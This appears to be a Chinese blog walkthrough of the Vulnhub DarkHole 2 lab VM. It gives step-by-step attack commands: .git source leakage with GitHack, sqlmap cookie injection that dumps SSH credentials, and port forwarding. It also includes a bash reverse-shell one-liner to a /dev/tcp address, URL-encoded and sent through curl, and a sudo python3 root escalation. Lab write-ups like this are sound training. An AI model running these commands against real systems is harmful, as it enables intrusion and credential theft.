Vulnhub靶机DarkHole渗透测试详解
- Vulnhub靶机介绍:
- Vulnhub靶机下载:
- Vulnhub靶机安装:
- Vulnhub靶机漏洞详解:
- ①:信息收集:
- ②:Git信息泄露:
- ③:SQL注入:
- ④:SSH登入:
- ⑤:漏洞利用&提权:
- ⑥:获取FLAG:
- Vulnhub靶机渗透总结:
Vulnhub靶机介绍:
vulnhub是个提供各种漏洞平台的综合靶场,可供下载多种虚拟机进行下载,本地VM打开即可,像做游戏一样去完成渗透测试、提权、漏洞利用、代码审计等等有趣的实战。
这是一个漏洞靶机,老样子需要找到flag即可。
Vulnhub靶机下载:
官网链接:https://download.vulnhub.com/darkhole/darkhole_2.zip
Vulnhub靶机安装:
下载好了把安装包解压 然后使用VMware打开即可。
Vulnhub靶机漏洞详解:
①:信息收集:
kali
里使用arp-scan -l
发现主机
渗透机:kali IP :172.16.5.120 靶机IP :172.16.5.170
使用命令:
nmap -sS -sV -T4 -n -p- 192.168.0.170
和DarkHole1
一样也是开启了22
和80
端口 还是老样子使用Web
扫描工具扫描 dirb、dirsearch、whatweb
等 发现了git
信息泄露
②:Git信息泄露:
git clone https://github.com/lijiejie/GitHack.git #下载GitHack
python3 GitHack.py http://172.16.5.170/.git #将源码下载本地
##PS: 我这里kali没网直接复制压缩包进去 都一样的
发现好像是数据库的命令,这里需要使用wegt
把./git
下下载:wget -r http://172.16.5.170/.git
下载了 .git
目录后,使用git clone . webapp
命令会将该目录创建一个webapp
的源码文件,可以在其中执行所有 git
操作。
然后执行 git log
发现git
日志当中存在修改记录,切换到该条记录下进行修改将 HEAD
切换到master
git checkout a4d9
cat login.php
得到密码为:lush@admin.com/321
尝试登入 发现登入成功!!!!
③:SQL注入:
发现网页URL
有id
存在可能存在SQL
注入可以直接使用sqlmap
工具,F12
获取网页cookie
值:PHPSESSID=hlt3utsl914cg3q9jpu8a9fpn4
sqlmap -u "http://172.16.5.170/dashboard.php?id=1" --cookie="PHPSESSID=hlt3utsl914cg3q9jpu8a9fpn4" --batch #存在漏洞
sqlmap -u "http://172.16.5.170/dashboard.php?id=1" --cookie="PHPSESSID=hlt3utsl914cg3q9jpu8a9fpn4" --batch --current-db ##列出数据库
sqlmap -u "http://172.16.5.170/dashboard.php?id=1" --cookie="PHPSESSID=hlt3utsl914cg3q9jpu8a9fpn4" --batch -D darkhole_2 --tables ##列出表
sqlmap -u "http://172.16.5.170/dashboard.php?id=1" --cookie="PHPSESSID=hlt3utsl914cg3q9jpu8a9fpn4" --batch -D darkhole_2 -T ssh --dump ##获取内容
得到了账号密码:jehad/fool
尝试SSH
登入!!
④:SSH登入:
⑤:漏洞利用&提权:
sudo -l
find / -user root -perm -4000 -print 2>/dev/null #查看有没有 SUID 文件可以利用
cat .bash_history #查看历史文件
cat /etc/crontab #查看定时任务
存在一个Web 9999
端口 访问不了 尝试端口转发到本地:ssh -L 9999:127.0.0.1:9999 jehad@172.16.5.170
历史记录里面有查看id
命令 发现是losy
用户的普通权限 可以开启nc
监听 反弹shell
PS:因为我在学校没做完 回家接着做所以这里的ip变了 但是不影响
bash -c 'sh -i >& /dev/tcp/192.168.0.126/7777 0>&1' #因为这里是GET传参 所以需要url编码
bash%20-c%20%27bash%20-i%20%3E%26%20/dev/tcp/192.168.0.126/7777%200%3E%261%27
curl http://127.0.0.1:9999/?cmd=bash%20-c%20%27bash%20-i%20%3E%26%20/dev/tcp/192.168.0.106/7777%200%3E%261%27
/bin/bash -i
history #查看历史文件
可以看到提权命令以及losy
用户密码:gang
然后SSH
登入!! sudo -l
查看 有sudo
权限
sudo /usr/bin/python3 -c 'import os; os.system("/bin/sh")' ###提权
⑥:获取FLAG:
至此至此获取到了flag,本篇文章渗透结束 感谢大家的观看!!
Vulnhub靶机渗透总结:
这个靶机难度适中
1.信息收集 获取ip地址 和端口信息 web
扫描工具:nikto,dirb,dirbuster,whatweb
等‘
2.sqlmap
工具cookie
注入 获取信息
3.这里需要主要的 端口转发 如果这个失败了 后面执行 curl
是失败的 这里卡了一会不然弹不上
4.GET
传参 url
编码 最后就是提权了sudo
提权。
这个系列的两篇完结拉!最后创作不易 希望对大家有所帮助 喜欢的话麻烦大家给个一键三连 你的开心就是我最大的快乐!!